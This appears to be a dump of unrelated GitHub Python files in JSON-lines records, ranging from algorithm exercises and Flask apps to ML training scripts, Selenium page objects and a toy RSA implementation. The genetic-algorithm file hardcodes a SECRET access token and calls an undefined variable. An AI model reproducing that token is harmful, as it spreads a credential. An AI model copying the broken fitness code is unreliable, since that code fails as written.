f\"{a}:\\n{repr(a)}\\n{c}:\\n{repr(c)}\\n{transformation}\"\n if transformation is None:\n for _ in range(4):\n a = a.rotate_cw()\n assert a != c, err_str\n else:\n verified_isomorphic = False\n for _ in range(4):\n a = a.rotate_cw()\n if a == c:\n verified_isomorphic = True\n break\n assert verified_isomorphic, err_str\n\n @mark.dependency(\n depends=[\n \"equality\",\n \"deepcopy\",\n \"rotate_cw\",\n \"rotate_ccw\",\n \"rotate_ht\",\n \"objs_minus_c4\",\n ]\n )\n @given(data())\n def test_rotate(self, data):\n a = data.draw(self.objs)\n b = deepcopy(a)\n\n assert a.rotate(RotationEnum.NOTHING) == b\n assert a.rotate_cw().rotate(RotationEnum.CCW) == b\n assert a.rotate_ht().rotate(RotationEnum.HT) == b\n assert a.rotate_ccw().rotate(RotationEnum.CW) == b\n\n with raises(AssertionError):\n a.rotate(None)\n\n with raises(Exception):\n a.rotate(12)\n","repo_name":"andfranklin/ErnosCube","sub_path":"tests/plane_rotatable_tests.py","file_name":"plane_rotatable_tests.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32689142206","text":"row = [-1, -1, -1, 0, 0, 1, 1, 1]\ncol = [-1, 0, 1, -1, 1, -1, 0, 1]\n\ndef isValid(mat, x, y, path):\n\treturn (0 <= x < len(mat)) and (0 <= y < len(mat[0])) and (x, y) not in path\n\ndef DFS(mat, word, i, j, path=[], index=0):\n if mat[i][j] != word[index]:\n return None\n path.append((i, j))\n if index == len(word) - 1:\n print(path)\n else:\n for z in range(len(row)):\n if isValid(mat, i + row[z], j + col[z], path):\n DFS(mat, word, i + row[z], j + col[z], path, index + 1)\n path.pop()\n\ndef WordSearch(mat, word):\n\t# base case\n\tif not mat or not len(mat) or not len(word):\n\t\treturn\n\n\tfor i in range(len(mat)):\n\t\tfor j in range(len(mat[0])):\n\t\t\tDFS(mat, word, i, j)\n\n\nif __name__ == '__main__':\n\n\tmat = [\n\t\t['A', 'D', 'E', 'B', 'C'],\n\t\t['O', 'O', 'C', 'A', 'X'],\n\t\t['S', 'C', 'D', 'K', 'C'],\n\t\t['O', 'D', 'E', 'H', 'L']\n\t]\n\tword = 'CODE'\n\n\tWordSearch(mat, word)\n","repo_name":"anguzz/AI-projects","sub_path":"Assignments/A2/WordSearch.py","file_name":"WordSearch.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73681312167","text":"import numpy as np\nimport client as ta\nimport json\nSECRET = 'z60uCu1jsJeEi4n96iH7qwpMMnvIO1BEdnbC38CokXIn9y9lSR'\n# TODO: We need to fig out these values... hmm\nMUTATION_PERC = 0.3\nMUTATION_RANGE = 1\nPOPULATION_SIZE = 7\nMATE_POOL_SIZE = 3\nMAX_GEN = 10\ninitial_chromosome = []\nctr = 0\n\n\ndef mutate_children(children, low=-MUTATION_RANGE, high=MUTATION_RANGE):\n for i in range(len(children)):\n noise = np.random.uniform(low=low, high=high, size=children[i].shape)\n indices = np.random.choice(np.arange(\n children[i].size), replace=False, size=int(children[i].size*(1-MUTATION_PERC)))\n noise[indices] = 0\n children[i] += noise\n return np.clip(children, -10, 10)\n\n\ndef get_fitness(chromosomes):\n fitness = []\n for chromosome in chromosomes:\n #ta_answer = ta.get_errors(SECRET, list(chromosome))\n fitness.append(ta_answer[0]+ta_answer[1])\n print(\n f'train error: {ta_answer[0]}, validation error: {ta_answer[1]}')\n return np.array(fitness)\n\n\ndef isIn(given_array, actual_list):\n for element in actual_list:\n if np.array_equal(element, given_array):\n return True\n return False\n\n\ndef cross(parent1, parent2):\n point = np.random.randint(4, 7)\n child1 = np.concatenate((parent1[:point], parent2[point:]), axis=0)\n child2 = np.concatenate((parent2[:point], parent1[point:]), axis=0)\n return child1, child2\n\n\ndef breed(selected_population):\n children = []\n child1, child2 = cross(selected_population[0], selected_population[1])\n children.append(child1)\n children.append(child2)\n mating_combinations = []\n while len(children) < (POPULATION_SIZE - MATE_POOL_SIZE):\n par_num1 = np.random.randint(0, np.shape(selected_population)[0])\n par_num2 = (par_num1 + 1) % np.shape(selected_population)[0]\n mating_combinations.append([par_num1, par_num2])\n child1, child2 = cross(\n selected_population[par_num1], selected_population[par_num2])\n if not isIn(child1, children):\n children.append(child1)\n if len(children) == POPULATION_SIZE-MATE_POOL_SIZE:\n break\n if not isIn(child2, children):\n children.append(child2)\n if len(children) == POPULATION_SIZE-MATE_POOL_SIZE:\n break\n return mutate_children(np.array(children))\n\n\ndef get_init(chromosome):\n '''Gets the initial Chromosomes'''\n temp = [list(chromosome) for i in range(POPULATION_SIZE)]\n temp = np.array(temp, dtype=np.double)\n temp = mutate_children(temp, -1, 1)\n temp[0] = chromosome\n return temp\n\n\n# TODO: Should this be read from file? That is, will the file overfit.txt be in evaluations or should it be hard-coded? ASK A TA...\nwith open(\"overfit.txt\", \"r\") as f:\n initial_chromosome = json.load(f)\n\npopulation = get_init(initial_chromosome)\nfitness = get_fitness(population)\n\nfor gen in range(MAX_GEN+1):\n sorted_fitness_index = np.argsort(fitness)\n population = population[sorted_fitness_index]\n fitness = fitness[sorted_fitness_index]\n print(\n f'gen: {gen} best:{fitness[0]}')\n population = population[:POPULATION_SIZE]\n fitness = fitness[:POPULATION_SIZE]\n selected_population = population[: MATE_POOL_SIZE]\n selected_fitness = fitness[: MATE_POOL_SIZE]\n children = breed(selected_population)\n children_fitness = get_fitness(children)\n population = np.concatenate((population, children), axis=0)\n fitness = np.concatenate((fitness, children_fitness), axis=0)\n\nfinal_fitness = np.min(fitness)\nprint(\"Answer\", final_fitness)\n","repo_name":"arjunth2001/Machine-Data-and-Learning","sub_path":"Genetic-Algorithms-Project/Trials/23_02/ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38796155062","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n if not l1.val or not l2.val:\n return l1 if l1.val else l2\n num1 = 0\n while l1:\n num1 = num1*10 + l1.val\n l1 = l1.next\n num2 = 0\n while l2:\n num2 = num2*10 + l2.val\n l2 = l2.next\n num = num1 + num2\n ans = ListNode(0)\n\n while num:\n p = ListNode(num % 10)\n num = num // 10\n tmp = ans.next\n ans.next = p\n p.next = tmp\n return ans.next\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/401-500/445-两数相加Ⅱ.py","file_name":"445-两数相加Ⅱ.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71265487847","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: gevent_demo.py\n# Author: lxw\n# Date: 12/11/17 2:30 PM\n\nimport gevent\nimport time\n\nfrom gevent import monkey\n\n# monkey.patch_socket()\n\ndef f(n):\n for i in range(n):\n print(\"gevent.getcurrent(): {0}. i: {1}\".format(gevent.getcurrent(), i))\n # time.sleep(1) # NO\n gevent.sleep(1) # OK\n\n\ndef main():\n g1 = gevent.spawn(f, 5)\n g2 = gevent.spawn(f, 5)\n g3 = gevent.spawn(f, 5)\n g1.join()\n g2.join()\n g3.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lxw0109/Python_Demos","sub_path":"gevent_demo.py","file_name":"gevent_demo.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"363223951","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(0,10,1000) #作图的变量自变量\ny = np.sin(x) + 1 #因变量y\nz = np.cos(x ** 2) + 1 #因变量z\n\nplt.figure(figsize=(8, 4)) #设置图像大小\nplt.plot(x , y, label = '$\\sin x + 1$', color = 'red', linewidth = 2) #作图,设置标签、线条颜色、线条大小\nplt.plot(x, z, 'b--', label = '$\\cos x^2+1$') #作图,设置标签、线条类型\nplt.xlabel('Time(s)') #设置x轴\nplt.ylabel('Volt') #设置y轴\nplt.title('A simple example') #设置标题\nplt.ylim(0,2.2) #设置y轴显示范围\nplt.legend() #显示图例\nplt.show() #显示作图结果","repo_name":"yidaodashi/pythonSkills","sub_path":"python数据分析与实战演练/简介/matplotlibtest.py","file_name":"matplotlibtest.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7563442105","text":"\ndef freecad_format(data_list):\n mesh_name = \"Mesh.add(\"\n converted = []\n for poly in data_list[2]:\n # print poly\n polygon = []\n for vert in poly:\n # print vert\n # print data_list[1][vert - 1]\n polygon.append(data_list[1][vert - 1])\n # print polygon\n converted += polygon\n\n # converted = map(lambda x: mesh_name + str(x) + \")\", converted)\n\n return converted\n","repo_name":"SimonTanner/BioDesic-Pattern-Fitter","sub_path":"freecad_formatter.py","file_name":"freecad_formatter.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22421027535","text":"from lib2to3.pgen2.token import NEWLINE\nfrom os import name\nfrom urllib import request\nfrom flask import Flask, render_template, request, redirect\nimport csv\n\napp = Flask(__name__)\n\n# @app.route(\"/\")\n# def hello_world():\n# return \"<p>Hello, World!</p>\"\n\n@app.route(\"/\")\ndef home_page():\n return render_template('index.html')\n\n@app.route(\"/<string:page_name>\")\ndef html_page(page_name):\n return render_template(page_name)\n\n# @app.route('/submit_form', methods=['POST', 'GET'])\n# def submit_form():\n# return 'Form submitted successfully!'\n\n\ndef write_csv(data):\n with open('database.csv', mode='a', newline='') as my_csv_file:\n email = data[\"email\"]\n subject = data[\"subject\"]\n message = data[\"message\"]\n csv_writer = csv.writer(my_csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow([email,subject,message])\n\ndef write_data(data):\n with open('database.txt', mode='a') as myfile:\n email = data[\"email\"]\n subject = data[\"subject\"]\n message = data[\"message\"]\n myfile.write(f'\\n {email} {subject} {message}')\n\n@app.route('/submit_form', methods=['POST', 'GET'])\ndef submit_form():\n if request.method == 'POST':\n try:\n data = request.form.to_dict()\n write_csv(data)\n return redirect('/thank_you.html')\n except:\n return 'failed to be saved into the database.'\n else:\n return 'Someting went wrong. '","repo_name":"andrewleung01/portfolio","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636358316","text":"def insert_space(text: str, index: int):\n text = text[:index] + ' ' + text[index:]\n print(text)\n return text\n\n\ndef reverse(text: str, sub_str: str):\n if sub_str in text:\n index = text.index(sub_str)\n text = text[:index] + text[index + len(sub_str):] + sub_str[::-1]\n print(text)\n return text\n print('error')\n return text\n\n\ndef change(text: str, sub_str: str, replacement: str):\n text = text.replace(sub_str, replacement)\n print(text)\n return text\n\n\nmessage = input()\ncommand = input()\nwhile not command == 'Reveal':\n command = command.split(':|:')\n if command[0] == 'InsertSpace':\n message = insert_space(message, int(command[1]))\n elif command[0] == 'Reverse':\n message = reverse(message, command[1])\n elif command[0] == 'ChangeAll':\n message = change(message, command[1], command[2])\n command = input()\nprint(f'You have a new text message: {message}')\n\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/Exams/03.Final_Exam_Retake/Secret_Chat.py","file_name":"Secret_Chat.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"40341081347","text":"import networkx as nx\nimport networkx.algorithms.community as nx_comm\nimport matplotlib.pyplot as plt\nfrom networkx.generators.random_graphs import gnm_random_graph\nimport pandas as pd\nimport numpy as np\nimport time\n# from SparseShield_NIvsHS.Scripts.SparseShieldSolver import SparseShieldSolver\n# from SparseShield_NIvsHS.Scripts.SparseShieldSeedlessSolver import SparseShieldSeedlessSolver\n# from SparseShield_NIvsHS.Scripts.NetShieldSolver import NetShieldSolver\nimport os\nimport tensorflow as tf\nfrom keras.models import load_model\nfrom keras.optimizers import SGD\nfrom matplotlib.figure import Figure\nimport random\n\nfrom flask import Flask, render_template, request\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport base64\nfrom io import BytesIO\n\napp = Flask(__name__, static_url_path='/static')\n\n\n\ndef read_graph_from_file(tree_dir, filename):\n with open(os.path.join(tree_dir, filename), 'r') as file:\n G = nx.DiGraph()\n for line in file:\n if '->' in line:\n parent_node, child_node = line.strip().split('->')\n G.add_edge(parent_node, child_node)\n return G\n\ndef str_to_npa(s):\n data_list = s.split(' ')\n c = 0\n for x in data_list:\n if x == '':\n c += 1\n for _ in range(c):\n data_list.remove('')\n data_array = np.array([float(num) for num in data_list])\n return data_array\n\ntree_dir = 'twitter15/tree'\nd1 = pd.read_csv('t15_text_n2v.csv')\nd1['n2v'] = d1['n2v'].apply(lambda x: x.replace('[', ''))\nd1['n2v'] = d1['n2v'].apply(lambda x: x.replace(']', ''))\nd1['n2v'] = d1['n2v'].apply(lambda x: str_to_npa(x))\n\nnodes_list = []\n\nwith open('t15_imm_nodes.txt', 'r') as f:\n for line in f:\n row_data = line.strip().split(',')[:-1] \n priority_nodes = [int(node) for node in row_data] \n nodes_list.append(priority_nodes)\n\nd1['nodes'] = nodes_list\nprint(\"Load BERT embeddings\")\nembeddings = np.load('bert_embeddings.npy')\n\nd1['bert_embeddings'] = list(embeddings)\n\n# model = load_model(\"model.h5\", compile=False)\n# model.compile(loss='binary_crossentropy', optimizer=SGD(), metrics=['accuracy'])\nfull_model = load_model(\"bert_n2v_model.h5\", compile=False)\nfull_model.compile(loss='binary_crossentropy', optimizer=SGD(), metrics=['accuracy'])\n\ndef draw_graph(row_index):\n tweet_id = d1.loc[row_index, 'tweet_id']\n G = read_graph_from_file(tree_dir, str(tweet_id) + \".txt\")\n pos = nx.kamada_kawai_layout(G)\n fig = plt.figure(figsize=(5, 5))\n nx.draw_networkx(G, pos, with_labels=True, node_color='skyblue', node_size=500, edge_color='gray')\n plt.axis('off')\n return fig\n\ndef draw_graph2(G):\n fig = plt.figure(figsize=(5, 5))\n pos = nx.kamada_kawai_layout(G)\n node_options = {\"node_color\": \"red\", \"node_size\":30}\n edge_options = {\"width\": .5, \"alpha\": .5, \"edge_color\":\"black\"}\n nx.draw_networkx_nodes(G, pos, **node_options)\n nx.draw_networkx_edges(G, pos, **edge_options)\n return fig\n \n\ndef draw_graph_imm(G, immunized_nodes):\n nodes = G.nodes()\n nodes_list = list(nodes)\n nodes_list[0]\n d = {nodes_list[i]: i for i in range(len(nodes_list))}\n H = nx.relabel_nodes(G, d)\n G = H.copy()\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))\n pos = nx.kamada_kawai_layout(G)\n \n \n immunized_node_options = {\"node_color\": \"green\", \"node_size\": 30}\n default_node_options = {\"node_color\": \"red\", \"node_size\": 30}\n \n nx.draw_networkx_nodes(G, pos, nodelist=immunized_nodes, ax=ax2, **immunized_node_options)\n \n non_immunized_nodes = [node for node in G.nodes() if node not in immunized_nodes]\n nx.draw_networkx_nodes(G, pos, nodelist=non_immunized_nodes, ax=ax2, **default_node_options)\n \n nx.draw_networkx_nodes(G, pos, ax=ax1, **default_node_options)\n\n ax2.set_title(\"Graph with Immunized nodes highlighted\") \n ax1.set_title(\"Original Graph\")\n \n \n edge_options = {\"width\": 0.5, \"alpha\": 0.5, \"edge_color\": \"black\"}\n nx.draw_networkx_edges(G, pos, ax=ax1, **edge_options)\n nx.draw_networkx_edges(G, pos, ax=ax2, **edge_options)\n \n return fig\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n number = int(request.form['number'])\n row_index = number\n text = d1.loc[row_index, 'text']\n tweet_id = d1.loc[row_index, 'tweet_id']\n bert_embedding = d1.loc[row_index, 'bert_embeddings']\n n2v_embedding = d1.loc[row_index, 'n2v']\n imm_nodes = d1.loc[row_index, 'nodes']\n input_embedding = bert_embedding.reshape(1, 33, 768)\n input_node = n2v_embedding.reshape(1, 100)\n input_node_tensor = tf.convert_to_tensor(input_node)\n input_tensor = tf.convert_to_tensor(input_embedding)\n prediction = full_model.predict([input_tensor, input_node_tensor])\n if prediction > 0.5:\n prediction = \"True News\"\n prediction_class = \"true-news\"\n else:\n prediction = \"Fake News\"\n prediction_class = \"fake-news\"\n print(prediction)\n G = read_graph_from_file(tree_dir, str(tweet_id) + \".txt\")\n fig = draw_graph_imm(G, imm_nodes)\n # Convert the figure to an image\n output = BytesIO()\n FigureCanvas(fig).print_png(output)\n image_data = base64.b64encode(output.getvalue()).decode('utf-8')\n return render_template('index.html', text=text, prediction=prediction, prediction_class=prediction_class, image_data=image_data)\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"mariusmarogel/FNDM","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24639395329","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nfrom dataloader_cropped_mass import async_data_loader, convert_lbl_to_ind\nfrom dataloader_cropped_mass import load_images_with_labels, clean_data\nfrom model import SmallConvNet, ImageClassifier, DenseNet\nimport time\nimport matplotlib.pyplot as plt\nimport scipy.misc\n\n\ndef analyze_image_data():\n '''\n Plots some useful statistics about the images...\n '''\n Xdat, Ydat = load_images_with_labels(0, 40, verbose=True)\n Ydat = np.array(convert_lbl_to_ind(Ydat))\n pdat = Xdat\n Xdat = list(map(lambda i: 256.0 * (i - i.min()) / (i.max() - i.min()), Xdat))\n Xdat = np.array(list(map(\n lambda i: scipy.misc.imresize(i, (226, 226)), Xdat)))\n\n for i in range(60):\n plt.subplot(133)\n plt.imshow(pdat[i])\n\n plt.subplot(131)\n plt.hist(Xdat.flatten(), bins=300)\n plt.subplot(132)\n plt.imshow(Xdat[i], cmap='Greys')\n plt.show()\n\n\ndef evaluate_cv_stats(sess, start, end, model, batch_size=32):\n total_accuracy = 0.0\n total_error = 0.0\n cvX, cvY = load_images_with_labels(start, end, verbose=True)\n cvX, cvY = clean_data(cvX, cvY)\n for i in range(0, cvX.shape[0], batch_size):\n acc, err = sess.run([model.accuracy, model.error],\n feed_dict={model.X: cvX[i:i+batch_size],\n model.Y: cvY[i:i+batch_size],\n model.m.training: False})\n total_accuracy += min(batch_size, cvX.shape[0] - i) * acc\n total_error += min(batch_size, cvX.shape[0] - i) * err\n return total_accuracy / cvX.shape[0], total_error / cvX.shape[0]\n\n\ndef train(M, out_classes=3, cv_iters=100):\n m = ImageClassifier(M, out_classes)\n global_step = m.global_step\n train_op = tf.train.MomentumOptimizer(1e-2, 0.9).minimize(m.error,\n global_step=global_step)\n\n summary_op = tf.summary.merge_all()\n logdir = os.path.join(\"tflogs\", m.name)\n sw = tf.summary.FileWriter(logdir)\n sv = tf.train.Supervisor(summary_op=None,\n summary_writer=None,\n logdir=logdir,\n global_step=global_step,\n save_model_secs=120)\n\n with sv.managed_session() as sess:\n data_gen = async_data_loader(size=(226, 226), start=0, end=1000, batch_size=32)\n sw.add_graph(sess.graph)\n while not sv.should_stop():\n start_time = time.perf_counter()\n imgs, lbls = next(data_gen)\n print(\"\\rData loading time: {}\".format(\n time.perf_counter() - start_time), end=\"\")\n lbls = np.array(convert_lbl_to_ind(lbls))\n s, _ = sess.run([summary_op, train_op], feed_dict={m.X: imgs, m.Y: lbls})\n sw.add_summary(s, global_step=sess.run(global_step))\n if sess.run(global_step) % cv_iters == 1:\n print()\n cvAcc, cvErr = evaluate_cv_stats(sess, 1000, 1318, m)\n cv_sum = tf.Summary(value=[\n tf.Summary.Value(tag=\"cv_accuracy\", simple_value=cvAcc),\n tf.Summary.Value(tag=\"cv_error\", simple_value=cvErr)])\n sw.add_summary(cv_sum, global_step=sess.run(global_step))\n print()\n\n\nif __name__ == '__main__':\n train(DenseNet)\n","repo_name":"samuelczhao/lung-cancer-detection-optimization","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38763794400","text":"from selenium.webdriver.common.by import By\nfrom helpers import constants\nfrom pages.BasePO import BasePO\nimport allure\n\n\nclass ApplicationFormPO(BasePO):\n \"\"\"Содержит методы для взаимодействия с элементами страницы 'Анкета с заявкой'\"\"\"\n\n # КНОПКИ ФОРМЫ\n\n CHECKBOX = (By.CSS_SELECTOR, \"[data-id='approve-rules-checkbox'] > div\")\n ACCEPT_BTN = (By.CSS_SELECTOR, \"[data-id='approve-button']\")\n\n SUSPEND_BTN = (By.CSS_SELECTOR, \"[data-id='suspend-button']\")\n DECLINE_BTN = (By.CSS_SELECTOR, \"[data-id='decline-button']\")\n\n # ЧАТ\n CHAT_SEND_BTN = (By.CSS_SELECTOR, \"div.chat__footer > a\")\n INSERT_MSG_FIELD = (By.CSS_SELECTOR, \"textarea\")\n\n # ПОПАП С КОММЕНТАРИЕМ\n POPUP_TEXT_FIELD = (By.CSS_SELECTOR, \"[data-id='decline-application-input']\")\n POPUP_SEND_BTN = (By.CSS_SELECTOR, \"[data-id='decline-application-button']\")\n\n def verify_document(self):\n self._wait_elements_displayed([self.DECLINE_BTN, self.ACCEPT_BTN])\n actual_reject_btn = self._get_element_text(self.DECLINE_BTN)\n actual_accept_btn = self._get_element_text(self.ACCEPT_BTN)\n assert actual_reject_btn == constants.REJECT\n assert actual_accept_btn == constants.ACCEPT\n return\n\n\n def click_agree_checkbox(self):\n \"\"\"\n Клик по кнопке \"Запросить заявку\"\n \"\"\"\n with allure.step(f\"Поставить галочку чек-бокс 'Запросить заявку' {self.CHECKBOX}\"):\n self._click_element(self.CHECKBOX)\n return self\n\n\n def click_accept_button(self):\n \"\"\"\n Клик по кнопке \"Подписать\" в заявке\n \"\"\"\n with allure.step(f\"Клик по кнопке 'Подписать' {self.ACCEPT_BTN}\"):\n self._click_element(self.ACCEPT_BTN)\n return self\n\n def click_suspend_button(self):\n \"\"\"\n Клик по кнопке \"Приостановить\" в заявке\n :return:\n \"\"\"\n self._click_element(self.SUSPEND_BTN)\n return self\n\n\n def click_decline_button(self):\n \"\"\"\n Клик по кнопке \"Отклонить\" в заявке\n :return:\n \"\"\"\n with allure.step(f\"Клик по кнопке 'Отклонить' {self.DECLINE_BTN}\"):\n self._click_element(self.DECLINE_BTN)\n return self\n\n def verify_popup(self):\n self._wait_for_element_present(self.POPUP_SEND_BTN)\n return self\n\n def fill_decline_comment_popup(self, comments):\n \"\"\"\n Заполнить попап для комментария и кликнуть \"Отправить\"\n \"\"\"\n with allure.step(f\"Ввести в поле {self.POPUP_TEXT_FIELD} текст\"):\n self.driver.find_element(*self.POPUP_TEXT_FIELD).send_keys(comments)\n with allure.step(f\"Клик по кнопке 'Отправить' {self.POPUP_SEND_BTN}\"):\n self._click_element(self.POPUP_SEND_BTN)\n return self\n","repo_name":"Siyavush91/pytest_bdd_example","sub_path":"pages/ApplicationFormPO.py","file_name":"ApplicationFormPO.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35162478887","text":"# import libraries\nimport cryptocompare\nimport pandas as pd\nimport datetime as datetime\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn-darkgrid')\n\n#module to fetch cryptocompare data and api key\nimport sys \nsys.path.append(\"..\")\nfrom data_modules.FMDA_quantra import get_cryptocompare_api\n\n#get the api key from data_modules folder\ncryptocompare_API_key=get_cryptocompare_api()\n#set api key in cryptocomapre object\ncryptocompare.cryptocompare._set_api_key_parameter(cryptocompare_API_key)\nprint(\"API key is set\")\n\n#fetch the raw ticker list\nraw_ticker_data=cryptocompare.get_coin_list()\n#convert the raw data from dictionary format to DataFrame\nall_tickers=pd.DataFrame.from_dict(raw_ticker_data).T\n\n# last 5 entries\nprint(\".......\")\nprint(all_tickers.tail())\n\n#bitcoin hourly data for 5th June 2021\n#define ticker symbol and other details\nticker_symbol='BTC'\ncurrency = 'USD'\nlimit_value = 2000\nexchange_name = 'CCCAGG'\ndata_before_timestamp = datetime(2021, 6,5, 0, 0)\n#fetch the raw price data\n","repo_name":"malinitin93/quantinsti-getting-market-data","sub_path":"crypto/cryptodata.py","file_name":"cryptodata.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4548479344","text":"import datetime\r\nimport calendar\r\n\r\n\r\nclass Sukaktis:\r\n def __init__(self, metai=2000, menuo=12, diena=12, valandos=12, minutes=12):\r\n self.metai = metai\r\n self.menuo = menuo\r\n self.diena = diena\r\n self.valandos = valandos\r\n self.minutes = minutes\r\n self.data = datetime.datetime(metai, menuo, diena, valandos, minutes)\r\n\r\n def smulkiai(self):\r\n now = datetime.datetime.now()\r\n skirtumas = now - self.data\r\n print(f\"Praėjo metų: \", skirtumas.days // 365)\r\n print(\"Praėjo mėnesių: \", skirtumas.days / 365 * 12)\r\n print(\"Praėjo savaičių: \", skirtumas.days / 7)\r\n print(\"Praėjo dienų: \", skirtumas.days)\r\n print(\"Praėjo valandų: \", skirtumas.total_seconds() / 3600)\r\n print(\"Praėjo minučių: \", skirtumas.total_seconds() / 60)\r\n print(\"Praėjo sekundžių: \", skirtumas.total_seconds())\r\n\r\n def arKeliamieji(self):\r\n if calendar.isleap(self.metai):\r\n print(\"Keliamieji metai\")\r\n\r\n def atimtiDienas(self, dienos):\r\n return self.data - datetime.timedelta(days=dienos)\r\n\r\n def pridetiDienas(self, dienos):\r\n return self.data + datetime.timedelta(days=dienos)\r\n\r\n def __str__(self):\r\n return (\r\n f\"Data: {self.metai}-{self.menuo}-{self.diena} {self.valandos}:{self.minutes}\")\r\n\r\n\r\ndata1 = Sukaktis(2000, 1, 1, 12, 12)\r\ndata1.arKeliamieji()\r\ndata1.smulkiai()\r\nprint(data1.atimtiDienas(5))\r\nprint(data1.pridetiDienas(45))\r\nprint(data1)\r\n","repo_name":"DonatasNoreika/python1lygis","sub_path":"Programos/Objektinis programavimas I/uzduotis2.py","file_name":"uzduotis2.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"lt","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9662069754","text":"import random\n\n\ndef is_prime(n: int) -> bool:\n \"\"\"\n >>> is_prime(2)\n True\n >>> is_prime(11)\n True\n >>> is_prime(8)\n False\n \"\"\"\n if n == 2:\n return True\n if n < 2 or n % 2 == 0:\n return False\n for i in range(2, int(n**0.5) + 1):\n if n % i == 0:\n return False\n return True\n\n\ndef generate_keypair(p: int, q: int):\n if not (is_prime(p) and is_prime(q)):\n raise ValueError(\"Both numbers must be prime.\")\n elif p == q:\n raise ValueError(\"p and q cannot be equal\")\n\n n = p * q\n\n phi = (p - 1) * (q - 1)\n\n e = random.randrange(1, phi)\n\n g = gcd(e, phi)\n while g != 1:\n e = random.randrange(1, phi)\n g = gcd(e, phi)\n\n d = multiplicative_inverse(e, phi)\n return ((e, n), (d, n))\n\n\ndef gcd(a: int, b: int) -> int:\n \"\"\"\n >>> gcd(12, 15)\n 3\n >>> gcd(3, 7)\n 1\n \"\"\"\n while a != 0 and b != 0:\n if a >= b:\n a %= b\n else:\n b %= a\n return a or b\n\n\ndef multiplicative_inverse(e: int, phi: int) -> int:\n \"\"\"\n >>> multiplicative_inverse(7, 40)\n 23\n \"\"\"\n n = phi\n u, u1 = 1, 0\n v, v1 = 0, 1\n while phi:\n q = e // phi\n u, u1 = u1, u - q * u1\n v, v1 = v1, v - q * v1\n e, phi = phi, e - q * phi\n return u % n\n","repo_name":"soreloserrr/cs102","sub_path":"homework01/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17195788727","text":"import sys\n\nsys.setrecursionlimit(10 ** 5)\ninput = sys.stdin.readline\n\n# parent 와 depth 기록\ndef dfs(x, dep):\n # depth 기록\n depth[x] = dep\n visited[x] = True\n\n for g in graph[x]:\n if not visited[g]:\n # parent 기록 후 재귀적 탐색\n parent[g] = x\n dfs(g, dep + 1)\n\nn = int(input())\n\ngraph = [[] for _ in range(n + 1)]\nparent = [0] * (n + 1)\ndepth = [0] * (n + 1)\nvisited = [False] * (n + 1)\n\nfor _ in range(n - 1):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\ndfs(1, 0)\n\nm = int(input())\n\nfor _ in range(m):\n a, b = map(int, input().split())\n\n # depth 먼저 맞춰주기\n while depth[a] != depth[b]:\n if depth[a] > depth[b]:\n a = parent[a]\n else:\n b = parent[b]\n\n # 부모로 올라가면서 LCA 탐색\n while a != b:\n a = parent[a]\n b = parent[b]\n\n print(a)","repo_name":"JungWooGeon/BAEKJOON","sub_path":"11437.py","file_name":"11437.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29564763807","text":"import shutil\nfrom pathlib import Path\n\nfrom 